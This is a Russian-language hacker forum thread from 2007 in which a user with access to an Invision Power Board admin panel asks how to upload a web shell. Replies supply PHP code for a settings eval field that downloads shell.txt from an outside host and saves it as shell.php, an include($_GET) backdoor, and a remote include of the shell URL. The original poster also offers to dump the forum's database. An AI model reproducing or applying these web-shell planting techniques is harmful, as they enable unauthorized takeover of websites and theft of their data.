Проблемы с заливкой шелла в ipb

Discussion in 'Песочница' started by anakreon, 17 Mar 2007.

  1. anakreon

    anakreon Elder - Старейшина

    Joined:
    19 Mar 2006
    Messages:
    30
    Likes Received:
    3
    Reputations:
    0
    Народ помогите!!!.
    Есть доступ к админке IPB. версия 2.1.*
    Не получается залить шелл через смайлы и phtml
    при скуль запросах из-под админки выдает ошибку.
    Могу слить базу.
    Подскажите пожалуйста решение данной проблемы.
     
  2. Zitt

    Zitt Elder - Старейшина

    Joined:
    7 May 2006
    Messages:
    736
    Likes Received:
    268
    Reputations:
    59
    Почему? В чём траблы?
     
    1 person likes this.
  3. anakreon

    anakreon Elder - Старейшина

    Joined:
    19 Mar 2006
    Messages:
    30
    Likes Received:
    3
    Reputations:
    0
    загрузка в смайлы запрещены.
    А через аттачи пишет ошибку. Мол обратитесь к админу для решения данной проблемы.
    Настроил все правильно
    так что остается только база. Вот и прошу совета как через базу залиться
     
  4. maxster

    maxster Elder - Старейшина

    Joined:
    27 Oct 2006
    Messages:
    188
    Likes Received:
    88
    Reputations:
    -7
    В очередной раз почему то забылась самая простая заливка шела через новую настройку,
    Идём в "настройки" выбираем любую из них, жмём добавить новую настройку, и в поле "Выполнение PHP-кода до отображения или сохранения настройки:" пишем любой php код, на пример такой:
    Code:
     $linky="http://site.ru/shell.txt";
    $saved="/usr/home/www/site/public_html/forum/uploads/shell.php";
    $from=fopen("$linky","r");
    $to=fopen("$saved","w");
    while(!feof($from)){
      $string=fgets($from,4096);
      fputs($to,$string);
    }
    fclose($to);
    fclose($from);
    
    Узнаем полный путь к uploads:
    "Настройки"->"Глобальные Настройки форума"->"Путь к папке /uploads/"
    обычно этот путь указывается.

    Author: VampiRUS
     
  5. anakreon

    anakreon Elder - Старейшина

    Joined:
    19 Mar 2006
    Messages:
    30
    Likes Received:
    3
    Reputations:
    0
    Гм... не проходит
    Ругается
    РЕДУПРЕЖДЕНИЕ IPB [2] fopen(): SAFE MODE Restriction in effect. The script whose uid is 1002 is not allowed to access /usr owned by uid 0 (Файл: /sources/admin/ad_settings.php(1145) : eval()'d code, строка: 4)
    ПРЕДУПРЕЖДЕНИЕ IPB [2] fopen(/usr/home/vladimir/forum/uploads/remview.php): failed to open stream: No such file or directory (Файл: /sources/admin/ad_settings.php(1145) : eval()'d code, строка: 4)
     
  6. maxster

    maxster Elder - Старейшина

    Joined:
    27 Oct 2006
    Messages:
    188
    Likes Received:
    88
    Reputations:
    -7
    значит там safe mod =)
     
  7. Zitt

    Zitt Elder - Старейшина

    Joined:
    7 May 2006
    Messages:
    736
    Likes Received:
    268
    Reputations:
    59
    а
    <? include($_GET["c"]); ?>
    неканает? или это для другого форума..))?
     
  8. anakreon

    anakreon Elder - Старейшина

    Joined:
    19 Mar 2006
    Messages:
    30
    Likes Received:
    3
    Reputations:
    0
    помоему это для пхпбб
     
  9. VampiRUS

    VampiRUS Elder - Старейшина

    Joined:
    31 Dec 2005
    Messages:
    210
    Likes Received:
    105
    Reputations:
    57
    Собстаенно должно проканать он ведь не стал ругаться на то что файл с удалённого хоста. Можно тупо вписать include("http://site.ru/shell.txt");, только потом геморно удалять его будет в некоторых случаях.